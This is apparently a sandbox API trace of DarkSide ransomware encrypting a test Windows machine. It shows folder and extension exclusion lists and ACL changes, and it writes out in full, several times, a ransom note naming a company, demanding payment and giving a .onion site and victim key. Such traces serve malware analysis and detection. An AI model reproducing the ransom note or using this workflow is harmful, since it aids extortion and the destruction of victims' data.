halpmcxz\\documents\\_6f2uodqzk-uc\\l7durqi7053o.pdf.c06622a1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x48000000, hTemplateFile=0x0) returned 0x1d8 [0158.168] CreateIoCompletionPort (FileHandle=0x1d8, ExistingCompletionPort=0x130, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x130 [0158.169] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x80104) returned 0x35a0020 [0158.177] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x764d1ed0 [0158.177] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x478b67b7 [0158.177] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x676a6a41 [0158.177] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x233985d7 [0158.177] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x38d89bad [0158.177] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x7832b4db [0158.177] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0xfbb0cdc [0158.177] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x167ea88c [0158.180] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x35a0094, Length=0x80) returned 0xba0e39e4 [0158.180] RtlComputeCrc32 (PartialCrc=0x39e4, Buffer=0x35a0094, Length=0x80) returned 0x5ffd2a16 [0158.180] RtlComputeCrc32 (PartialCrc=0x2a16, Buffer=0x35a0094, Length=0x80) returned 0xde51556 [0158.180] RtlComputeCrc32 (PartialCrc=0x1556, Buffer=0x35a0094, Length=0x80) returned 0xf215903c [0158.181] RtlComputeCrc32 (PartialCrc=0x903c, Buffer=0x35a0094, Length=0x80) returned 0xde74425 [0158.181] PostQueuedCompletionStatus (CompletionPort=0x130, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x35a0020) returned 1 [0158.181] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3240060) returned 1 [0158.181] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3250068) returned 1 [0158.181] FindNextFileW (in: hFindFile=0x154188, lpFindFileData=0x32eb1c | out: lpFindFileData=0x32eb1c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x84c98fc0, ftCreationTime.dwHighDateTime=0x1d5dd4d, ftLastAccessTime.dwLowDateTime=0xe6ad0090, ftLastAccessTime.dwHighDateTime=0x1d5e4ec, ftLastWriteTime.dwLowDateTime=0xe6ad0090, ftLastWriteTime.dwHighDateTime=0x1d5e4ec, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="QNlgQkm9Qwac", cAlternateFileName="QNLGQK~1")) returned 1 [0158.181] _wcsicmp (_Str1="$recycle.bin", _Str2="QNlgQkm9Qwac") returned -77 [0158.181] wcslen (_String="$recycle.bin") returned 0xc [0158.181] _wcsicmp (_Str1="config.msi", _Str2="QNlgQkm9Qwac") returned -14 [0158.181] wcslen (_String="config.msi") returned 0xa [0158.181] _wcsicmp (_Str1="$windows.~bt", _Str2="QNlgQkm9Qwac") returned -77 [0158.181] wcslen (_String="$windows.~bt") returned 0xc [0158.181] _wcsicmp (_Str1="$windows.~ws", _Str2="QNlgQkm9Qwac") returned -77 [0158.181] wcslen (_String="$windows.~ws") returned 0xc [0158.181] _wcsicmp (_Str1="windows", _Str2="QNlgQkm9Qwac") returned 6 [0158.181] wcslen (_String="windows") returned 0x7 [0158.181] _wcsicmp (_Str1="appdata", _Str2="QNlgQkm9Qwac") returned -16 [0158.181] wcslen (_String="appdata") returned 0x7 [0158.181] _wcsicmp (_Str1="application data", _Str2="QNlgQkm9Qwac") returned -16 [0158.181] wcslen (_String="application data") returned 0x10 [0158.181] _wcsicmp (_Str1="boot", _Str2="QNlgQkm9Qwac") returned -15 [0158.181] wcslen (_String="boot") returned 0x4 [0158.181] _wcsicmp (_Str1="google", _Str2="QNlgQkm9Qwac") returned -10 [0158.181] wcslen (_String="google") returned 0x6 [0158.181] _wcsicmp (_Str1="mozilla", _Str2="QNlgQkm9Qwac") returned -4 [0158.181] wcslen (_String="mozilla") returned 0x7 [0158.182] _wcsicmp (_Str1="program files", _Str2="QNlgQkm9Qwac") returned -1 [0158.182] wcslen (_String="program files") returned 0xd [0158.182] _wcsicmp (_Str1="program files (x86)", _Str2="QNlgQkm9Qwac") returned -1 [0158.182] wcslen (_String="program files (x86)") returned 0x13 [0158.182] _wcsicmp (_Str1="programdata", _Str2="QNlgQkm9Qwac") returned -1 [0158.182] wcslen (_String="programdata") returned 0xb [0158.182] _wcsicmp (_Str1="system volume information", _Str2="QNlgQkm9Qwac") returned 2 [0158.182] wcslen (_String="system volume information") returned 0x19 [0158.182] _wcsicmp (_Str1="tor browser", _Str2="QNlgQkm9Qwac") returned 3 [0158.182] wcslen (_String="tor browser") returned 0xb [0158.182] _wcsicmp (_Str1="windows.old", _Str2="QNlgQkm9Qwac") returned 6 [0158.182] wcslen (_String="windows.old") returned 0xb [0158.182] _wcsicmp (_Str1="intel", _Str2="QNlgQkm9Qwac") returned -8 [0158.182] wcslen (_String="intel") returned 0x5 [0158.182] _wcsicmp (_Str1="msocache", _Str2="QNlgQkm9Qwac") returned -4 [0158.182] wcslen (_String="msocache") returned 0x8 [0158.182] _wcsicmp (_Str1="perflogs", _Str2="QNlgQkm9Qwac") returned -1 [0158.182] wcslen (_String="perflogs") returned 0x8 [0158.182] _wcsicmp (_Str1="x64dbg", _Str2="QNlgQkm9Qwac") returned 7 [0158.182] wcslen (_String="x64dbg") returned 0x6 [0158.182] _wcsicmp (_Str1="public", _Str2="QNlgQkm9Qwac") returned -1 [0158.182] wcslen (_String="public") returned 0x6 [0158.182] _wcsicmp (_Str1="all users", _Str2="QNlgQkm9Qwac") returned -16 [0158.182] wcslen (_String="all users") returned 0x9 [0158.182] _wcsicmp (_Str1="default", _Str2="QNlgQkm9Qwac") returned -13 [0158.182] wcslen (_String="default") returned 0x7 [0158.183] wcscpy (in: _Dest=0x3220050, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_6F2UOdqzk-Uc\\*" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_6F2UOdqzk-Uc\\*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_6F2UOdqzk-Uc\\*" [0158.183] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_6F2UOdqzk-Uc\\*") returned 0x3b [0158.183] wcscpy (in: _Dest=0x32200c4, _Source="QNlgQkm9Qwac" | out: _Dest="QNlgQkm9Qwac") returned="QNlgQkm9Qwac" [0158.183] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x3240060 [0158.183] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x3250068 [0158.184] wcscpy (in: _Dest=0x3240060, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_6F2UOdqzk-Uc\\QNlgQkm9Qwac" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_6F2UOdqzk-Uc\\QNlgQkm9Qwac") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_6F2UOdqzk-Uc\\QNlgQkm9Qwac" [0158.184] GetNamedSecurityInfoW () returned 0x0 [0158.185] SetEntriesInAclW () returned 0x0 [0158.185] SetNamedSecurityInfoW () returned 0x0 [0158.200] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x22af88) returned 1 [0158.200] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x32e66c | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0158.200] SetCurrentDirectoryW (lpPathName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_6F2UOdqzk-Uc\\QNlgQkm9Qwac" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\_6f2uodqzk-uc\\qnlgqkm9qwac")) returned 1 [0158.200] strlen (_Str="----------- [ Welcome to DarkSide - I-D Foods Corporation] -------------> \r\n \r\n What happend? \r\n ---------------------------------------------- \r\n Your computers and servers are encrypted, backups are deleted. We use strong encryption algorithms, so you cannot decrypt your data. \r\n But you can restore everything by purchasing a special program from us - universal decryptor. This program will restore all your network. \r\n Follow our instructions below and you will recover all your data. \r\n \r\n What guarantees? \r\n ---------------------------------------------- \r\n We value our reputation. If we do not do our work and liabilities, nobody will pay us. This is not in our interests. \r\n All our decryption software is perfectly tested and will decrypt your data. We will also provide support in case of problems. \r\n We guarantee to decrypt one file for free. Go to the site and contact us. \r\n \r\n How to get access on website? \r\n ---------------------------------------------- \r\n Using a TOR browser: \r\n 1) Download and install TOR browser from this site: https://torproject.org/ \r\n 2) Open our website: http://darksidfqzcuhtk2.onion/LYID3U99RAJSTEYEFWS6SLYDGMUXKNAT3OPKN9D56PIGX1QHBU5DHGUN4HGMX2IW \r\n \r\n When you open our website, put the following data in the input form: \r\n Key: \r\n \r\n 9NtjyWHbqWYTbhBpJ2ht4tKo7DQgTGmQ4IGHCFvgjiSMTNopVgQ9YIh9KRWkQgmvxviZtJGOakzykMzWKRgxwf2pCxpdMT8iGlKcsSOsxVOUXIGEgpy6tLqliTTEKWnohcYOhCF3DYMePMxEYa0eCmED1EXEG5QOZCpmkgDl5s5VSUF5uhnKsunUtKGS24iEAr2hxsJ1zMcMHmKVrf3bvRyhYVKXwlXVggxE7ncowldcK3v3CiKC24jKVd6OH5QrhVyyQLrFM5RE3Y0RcTeRTIqf1J5CIEhTiG3TH7SEpws4wfkt9RZ7rBWT4n3B69Z9JuPzyFCBwPKF7gTzEYzixIGzFbJyLSZXff9ryv3yL3JeKywAcoBafos0dLSkRgf1X1a1S2ud4kXa5GRU4W7rhCQsnJ8vAcv1AXaPRq9ESySBWQdGCQMSci0ex0oE4EfCDW3jjyXtaPofqNFhibodJFmOyTKwie1OcW6Kh6Ih6JxXXfUXr4VbRILzsiPXsOTTisDaEicID1E0SJRluBus2UhPyogJiZ7UpmUu9LUe3yAi3Bhox3pLv8E \r\n \r\n !!! DANGER !!! \r\n DO NOT MODIFY or try to RECOVER any files yourself. We WILL NOT be able to RESTORE them. \r\n !!! DANGER !!!") returned 0x7ca [0158.200] CreateFileW (lpFileName="README.c06622a1.TXT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\_6f2uodqzk-uc\\qnlgqkm9qwac\\readme.c06622a1.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0158.201] WriteFile (in: hFile=0x1a4, lpBuffer=0x17dc98*, nNumberOfBytesToWrite=0x7ca, lpNumberOfBytesWritten=0x32e63c, lpOverlapped=0x0 | out: lpBuffer=0x17dc98*, lpNumberOfBytesWritten=0x32e63c*=0x7ca, lpOverlapped=0x0) returned 1 [0158.202] CloseHandle (hObject=0x1a4) returned 1 [0158.202] SetCurrentDirectoryW (lpPathName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 1 [0158.202] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_6F2UOdqzk-Uc\\QNlgQkm9Qwac" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\_6f2uodqzk-uc\\qnlgqkm9qwac")) returned 0x10 [0158.202] PathAddBackslashW (in: pszPath="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_6F2UOdqzk-Uc\\QNlgQkm9Qwac" | out: pszPath="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_6F2UOdqzk-Uc\\QNlgQkm9Qwac\\") returned="" [0158.202] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_6F2UOdqzk-Uc\\QNlgQkm9Qwac\\") returned 0x47 [0158.202] FindFirstFileExW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_6F2UOdqzk-Uc\\QNlgQkm9Qwac\\*", fInfoLevelId=0x0, lpFindFileData=0x32e89c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x32e89c) returned 0x1541c8 [0158.203] FindNextFileW (in: hFindFile=0x1541c8, lpFindFileData=0x32e89c | out: lpFindFileData=0x32e89c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x84c98fc0, ftCreationTime.dwHighDateTime=0x1d5dd4d, ftLastAccessTime.dwLowDateTime=0x8bfe7ac0, ftLastAccessTime.dwHighDateTime=0x1d6eb2b, ftLastWriteTime.dwLowDateTime=0x8bfe7ac0, ftLastWriteTime.dwHighDateTime=0x1d6eb2b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0158.203] FindNextFileW (in: hFindFile=0x1541c8, lpFindFileData=0x32e89c | out: lpFindFileData=0x32e89c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x78eab420, ftCreationTime.dwHighDateTime=0x1d5e713, ftLastAccessTime.dwLowDateTime=0x1cf727a0, ftLastAccessTime.dwHighDateTime=0x1d5e558, ftLastWriteTime.dwLowDateTime=0x1cf727a0, ftLastWriteTime.dwHighDateTime=0x1d5e558, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="-QFYowbe", cAlternateFileName="")) returned 1 [0158.203] _wcsicmp (_Str1="$recycle.bin", _Str2="-QFYowbe") returned -9 [0158.203] wcslen (_String="$recycle.bin") returned 0xc [0158.203] _wcsicmp (_Str1="config.msi", _Str2="-QFYowbe") returned 54 [0158.203] wcslen (_String="config.msi") returned 0xa [0158.203] _wcsicmp (_Str1="$windows.~bt", _Str2="-QFYowbe") returned -9 [0158.203] wcslen (_String="$windows.~bt") returned 0xc [0158.203] _wcsicmp (_Str1="$windows.~ws", _Str2="-QFYowbe") returned -9 [0158.203] wcslen (_String="$windows.~ws") returned 0xc [0158.203] _wcsicmp (_Str1="windows", _Str2="-QFYowbe") returned 74 [0158.203] wcslen (_String="windows") returned 0x7 [0158.203] _wcsicmp (_Str1="appdata", _Str2="-QFYowbe") returned 52 [0158.204] wcslen (_String="appdata") returned 0x7 [0158.204] _wcsicmp (_Str1="application data", _Str2="-QFYowbe") returned 52 [0158.204] wcslen (_String="application data") returned 0x10 [0158.204] _wcsicmp (_Str1="boot", _Str2="-QFYowbe") returned 53 [0158.204] wcslen (_String="boot") returned 0x4 [0158.204] _wcsicmp (_Str1="google", _Str2="-QFYowbe") returned 58 [0158.204] wcslen (_String="google") returned 0x6 [0158.204] _wcsicmp (_Str1="mozilla", _Str2="-QFYowbe") returned 64 [0158.204] wcslen (_String="mozilla") returned 0x7 [0158.204] _wcsicmp (_Str1="program files", _Str2="-QFYowbe") returned 67 [0158.204] wcslen (_String="program files") returned 0xd [0158.204] _wcsicmp (_Str1="program files (x86)", _Str2="-QFYowbe") returned 67 [0158.204] wcslen (_String="program files (x86)") returned 0x13 [0158.204] _wcsicmp (_Str1="programdata", _Str2="-QFYowbe") returned 67 [0158.204] wcslen (_String="programdata") returned 0xb [0158.204] _wcsicmp (_Str1="system volume information", _Str2="-QFYowbe") returned 70 [0158.204] wcslen (_String="system volume information") returned 0x19 [0158.204] _wcsicmp (_Str1="tor browser", _Str2="-QFYowbe") returned 71 [0158.204] wcslen (_String="tor browser") returned 0xb [0158.204] _wcsicmp (_Str1="windows.old", _Str2="-QFYowbe") returned 74 [0158.204] wcslen (_String="windows.old") returned 0xb [0158.205] _wcsicmp (_Str1="intel", _Str2="-QFYowbe") returned 60 [0158.205] wcslen (_String="intel") returned 0x5 [0158.205] _wcsicmp (_Str1="msocache", _Str2="-QFYowbe") returned 64 [0158.205] wcslen (_String="msocache") returned 0x8 [0158.205] _wcsicmp (_Str1="perflogs", _Str2="-QFYowbe") returned 67 [0158.205] wcslen (_String="perflogs") returned 0x8 [0158.205] _wcsicmp (_Str1="x64dbg", _Str2="-QFYowbe") returned 75 [0158.205] wcslen (_String="x64dbg") returned 0x6 [0158.205] _wcsicmp (_Str1="public", _Str2="-QFYowbe") returned 67 [0158.205] wcslen (_String="public") returned 0x6 [0158.205] _wcsicmp (_Str1="all users", _Str2="-QFYowbe") returned 52 [0158.205] wcslen (_String="all users") returned 0x9 [0158.205] _wcsicmp (_Str1="default", _Str2="-QFYowbe") returned 55 [0158.205] wcslen (_String="default") returned 0x7 [0158.205] wcscpy (in: _Dest=0x3250068, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_6F2UOdqzk-Uc\\QNlgQkm9Qwac\\*" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_6F2UOdqzk-Uc\\QNlgQkm9Qwac\\*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_6F2UOdqzk-Uc\\QNlgQkm9Qwac\\*" [0158.205] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_6F2UOdqzk-Uc\\QNlgQkm9Qwac\\*") returned 0x48 [0158.205] wcscpy (in: _Dest=0x32500f6, _Source="-QFYowbe" | out: _Dest="-QFYowbe") returned="-QFYowbe" [0158.205] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x3270078 [0158.206] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x3280080 [0158.244] wcscpy (in: _Dest=0x3270078, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_6F2UOdqzk-Uc\\QNlgQkm9Qwac\\-QFYowbe" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_6F2UOdqzk-Uc\\QNlgQkm9Qwac\\-QFYowbe") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_6F2UOdqzk-Uc\\QNlgQkm9Qwac\\-QFYowbe" [0158.244] GetNamedSecurityInfoW () returned 0x0 [0158.245] SetEntriesInAclW () returned 0x0 [0158.245] SetNamedSecurityInfoW () returned 0x0 [0158.250] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x22b028) returned 1 [0158.251] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x32e3ec | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0158.251] SetCurrentDirectoryW (lpPathName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_6F2UOdqzk-Uc\\QNlgQkm9Qwac\\-QFYowbe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\_6f2uodqzk-uc\\qnlgqkm9qwac\\-qfyowbe")) returned 1 [0158.251] strlen (_Str="----------- [ Welcome to DarkSide - I-D Foods Corporation] -------------> \r\n \r\n What happend? \r\n ---------------------------------------------- \r\n Your computers and servers are encrypted, backups are deleted. We use strong encryption algorithms, so you cannot decrypt your data. \r\n But you can restore everything by purchasing a special program from us - universal decryptor. This program will restore all your network. \r\n Follow our instructions below and you will recover all your data. \r\n \r\n What guarantees? \r\n ---------------------------------------------- \r\n We value our reputation. If we do not do our work and liabilities, nobody will pay us. This is not in our interests. \r\n All our decryption software is perfectly tested and will decrypt your data. We will also provide support in case of problems. \r\n We guarantee to decrypt one file for free. Go to the site and contact us. \r\n \r\n How to get access on website? \r\n ---------------------------------------------- \r\n Using a TOR browser: \r\n 1) Download and install TOR browser from this site: https://torproject.org/ \r\n 2) Open our website: http://darksidfqzcuhtk2.onion/LYID3U99RAJSTEYEFWS6SLYDGMUXKNAT3OPKN9D56PIGX1QHBU5DHGUN4HGMX2IW \r\n \r\n When you open our website, put the following data in the input form: \r\n Key: \r\n \r\n 9NtjyWHbqWYTbhBpJ2ht4tKo7DQgTGmQ4IGHCFvgjiSMTNopVgQ9YIh9KRWkQgmvxviZtJGOakzykMzWKRgxwf2pCxpdMT8iGlKcsSOsxVOUXIGEgpy6tLqliTTEKWnohcYOhCF3DYMePMxEYa0eCmED1EXEG5QOZCpmkgDl5s5VSUF5uhnKsunUtKGS24iEAr2hxsJ1zMcMHmKVrf3bvRyhYVKXwlXVggxE7ncowldcK3v3CiKC24jKVd6OH5QrhVyyQLrFM5RE3Y0RcTeRTIqf1J5CIEhTiG3TH7SEpws4wfkt9RZ7rBWT4n3B69Z9JuPzyFCBwPKF7gTzEYzixIGzFbJyLSZXff9ryv3yL3JeKywAcoBafos0dLSkRgf1X1a1S2ud4kXa5GRU4W7rhCQsnJ8vAcv1AXaPRq9ESySBWQdGCQMSci0ex0oE4EfCDW3jjyXtaPofqNFhibodJFmOyTKwie1OcW6Kh6Ih6JxXXfUXr4VbRILzsiPXsOTTisDaEicID1E0SJRluBus2UhPyogJiZ7UpmUu9LUe3yAi3Bhox3pLv8E \r\n \r\n !!! DANGER !!! \r\n DO NOT MODIFY or try to RECOVER any files yourself. We WILL NOT be able to RESTORE them. \r\n !!! DANGER !!!") returned 0x7ca [0158.251] CreateFileW (lpFileName="README.c06622a1.TXT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\_6f2uodqzk-uc\\qnlgqkm9qwac\\-qfyowbe\\readme.c06622a1.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0158.252] WriteFile (in: hFile=0x1a4, lpBuffer=0x17dc98*, nNumberOfBytesToWrite=0x7ca, lpNumberOfBytesWritten=0x32e3bc, lpOverlapped=0x0 | out: lpBuffer=0x17dc98*, lpNumberOfBytesWritten=0x32e3bc*=0x7ca, lpOverlapped=0x0) returned 1 [0158.253] CloseHandle (hObject=0x1a4) returned 1 [0158.253] SetCurrentDirectoryW (lpPathName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 1 [0158.253] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_6F2UOdqzk-Uc\\QNlgQkm9Qwac\\-QFYowbe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\_6f2uodqzk-uc\\qnlgqkm9qwac\\-qfyowbe")) returned 0x10 [0158.254] PathAddBackslashW (in: pszPath="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_6F2UOdqzk-Uc\\QNlgQkm9Qwac\\-QFYowbe" | out: pszPath="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_6F2UOdqzk-Uc\\QNlgQkm9Qwac\\-QFYowbe\\") returned="" [0158.254] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_6F2UOdqzk-Uc\\QNlgQkm9Qwac\\-QFYowbe\\") returned 0x50 [0158.254] FindFirstFileExW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_6F2UOdqzk-Uc\\QNlgQkm9Qwac\\-QFYowbe\\*", fInfoLevelId=0x0, lpFindFileData=0x32e61c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x32e61c) returned 0x154208 [0158.254] FindNextFileW (in: hFindFile=0x154208, lpFindFileData=0x32e61c | out: lpFindFileData=0x32e61c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x78eab420, ftCreationTime.dwHighDateTime=0x1d5e713, ftLastAccessTime.dwLowDateTime=0x8c059ee0, ftLastAccessTime.dwHighDateTime=0x1d6eb2b, ftLastWriteTime.dwLowDateTime=0x8c059ee0, ftLastWriteTime.dwHighDateTime=0x1d6eb2b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0158.259] FindNextFileW (in: hFindFile=0x154208, lpFindFileData=0x32e61c | out: lpFindFileData=0x32e61c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x44e9ec90, ftCreationTime.dwHighDateTime=0x1d5e6c3, ftLastAccessTime.dwLowDateTime=0xef5c3080, ftLastAccessTime.dwHighDateTime=0x1d5e14f, ftLastWriteTime.dwLowDateTime=0xef5c3080, ftLastWriteTime.dwHighDateTime=0x1d5e14f, nFileSizeHigh=0x0, nFileSizeLow=0x11c6b, dwReserved0=0x0, dwReserved1=0x0, cFileName="2ySz27JapBU0Oa.pps", cAlternateFileName="2YSZ27~1.PPS")) returned 1 [0158.259] _wcsicmp (_Str1="2ySz27JapBU0Oa.pps", _Str2="README.c06622a1.TXT") returned -64 [0158.259] wcsstr (_Str="2ySz27JapBU0Oa.pps", _SubStr="README") returned 0x0 [0158.259] _wcsicmp (_Str1="autorun.inf", _Str2="2ySz27JapBU0Oa.pps") returned 47 [0158.259] wcslen (_String="autorun.inf") returned 0xb [0158.259] _wcsicmp (_Str1="boot.ini", _Str2="2ySz27JapBU0Oa.pps") returned 48 [0158.259] wcslen (_String="boot.ini") returned 0x8 [0158.259] _wcsicmp (_Str1="bootfont.bin", _Str2="2ySz27JapBU0Oa.pps") returned 48 [0158.260] wcslen (_String="bootfont.bin") returned 0xc [0158.260] _wcsicmp (_Str1="bootsect.bak", _Str2="2ySz27JapBU0Oa.pps") returned 48 [0158.260] wcslen (_String="bootsect.bak") returned 0xc [0158.260] _wcsicmp (_Str1="desktop.ini", _Str2="2ySz27JapBU0Oa.pps") returned 50 [0158.260] wcslen (_String="desktop.ini") returned 0xb [0158.260] _wcsicmp (_Str1="iconcache.db", _Str2="2ySz27JapBU0Oa.pps") returned 55 [0158.260] wcslen (_String="iconcache.db") returned 0xc [0158.260] _wcsicmp (_Str1="ntldr", _Str2="2ySz27JapBU0Oa.pps") returned 60 [0158.260] wcslen (_String="ntldr") returned 0x5 [0158.260] _wcsicmp (_Str1="ntuser.dat", _Str2="2ySz27JapBU0Oa.pps") returned 60 [0158.260] wcslen (_String="ntuser.dat") returned 0xa [0158.260] _wcsicmp (_Str1="ntuser.dat.log", _Str2="2ySz27JapBU0Oa.pps") returned 60 [0158.260] wcslen (_String="ntuser.dat.log") returned 0xe [0158.260] _wcsicmp (_Str1="ntuser.ini", _Str2="2ySz27JapBU0Oa.pps") returned 60 [0158.260] wcslen (_String="ntuser.ini") returned 0xa [0158.260] _wcsicmp (_Str1="thumbs.db", _Str2="2ySz27JapBU0Oa.pps") returned 66 [0158.260] wcslen (_String="thumbs.db") returned 0x9 [0158.260] _wcsicmp (_Str1="386", _Str2="pps") returned -61 [0158.261] wcslen (_String="386") returned 0x3 [0158.261] _wcsicmp (_Str1="adv", _Str2="pps") returned -15 [0158.261] wcslen (_String="adv") returned 0x3 [0158.261] _wcsicmp (_Str1="ani", _Str2="pps") returned -15 [0158.261] wcslen (_String="ani") returned 0x3 [0158.261] _wcsicmp (_Str1="bat", _Str2="pps") returned -14 [0158.261] wcslen (_String="bat") returned 0x3 [0158.261] _wcsicmp (_Str1="bin", _Str2="pps") returned -14 [0158.261] wcslen (_String="bin") returned 0x3 [0158.261] _wcsicmp (_Str1="cab", _Str2="pps") returned -13 [0158.261] wcslen (_String="cab") returned 0x3 [0158.261] _wcsicmp (_Str1="cmd", _Str2="pps") returned -13 [0158.261] wcslen (_String="cmd") returned 0x3 [0158.261] _wcsicmp (_Str1="com", _Str2="pps") returned -13 [0158.261] wcslen (_String="com") returned 0x3 [0158.261] _wcsicmp (_Str1="cpl", _Str2="pps") returned -13 [0158.261] wcslen (_String="cpl") returned 0x3 [0158.261] _wcsicmp (_Str1="cur", _Str2="pps") returned -13 [0158.261] wcslen (_String="cur") returned 0x3 [0158.261] _wcsicmp (_Str1="deskthemepack", _Str2="pps") returned -12 [0158.261] wcslen (_String="deskthemepack") returned 0xd [0158.262] _wcsicmp (_Str1="diagcab", _Str2="pps") returned -12 [0158.262] wcslen (_String="diagcab") returned 0x7 [0158.262] _wcsicmp (_Str1="diagcfg", _Str2="pps") returned -12 [0158.262] wcslen (_String="diagcfg") returned 0x7 [0158.262] _wcsicmp (_Str1="diagpkg", _Str2="pps") returned -12 [0158.262] wcslen (_String="diagpkg") returned 0x7 [0158.262] _wcsicmp (_Str1="dll", _Str2="pps") returned -12 [0158.262] wcslen (_String="dll") returned 0x3 [0158.262] _wcsicmp (_Str1="drv", _Str2="pps") returned -12 [0158.262] wcslen (_String="drv") returned 0x3 [0158.262] _wcsicmp (_Str1="exe", _Str2="pps") returned -11 [0158.262] wcslen (_String="exe") returned 0x3 [0158.262] _wcsicmp (_Str1="hlp", _Str2="pps") returned -8 [0158.262] wcslen (_String="hlp") returned 0x3 [0158.262] _wcsicmp (_Str1="icl", _Str2="pps") returned -7 [0158.262] wcslen (_String="icl") returned 0x3 [0158.262] 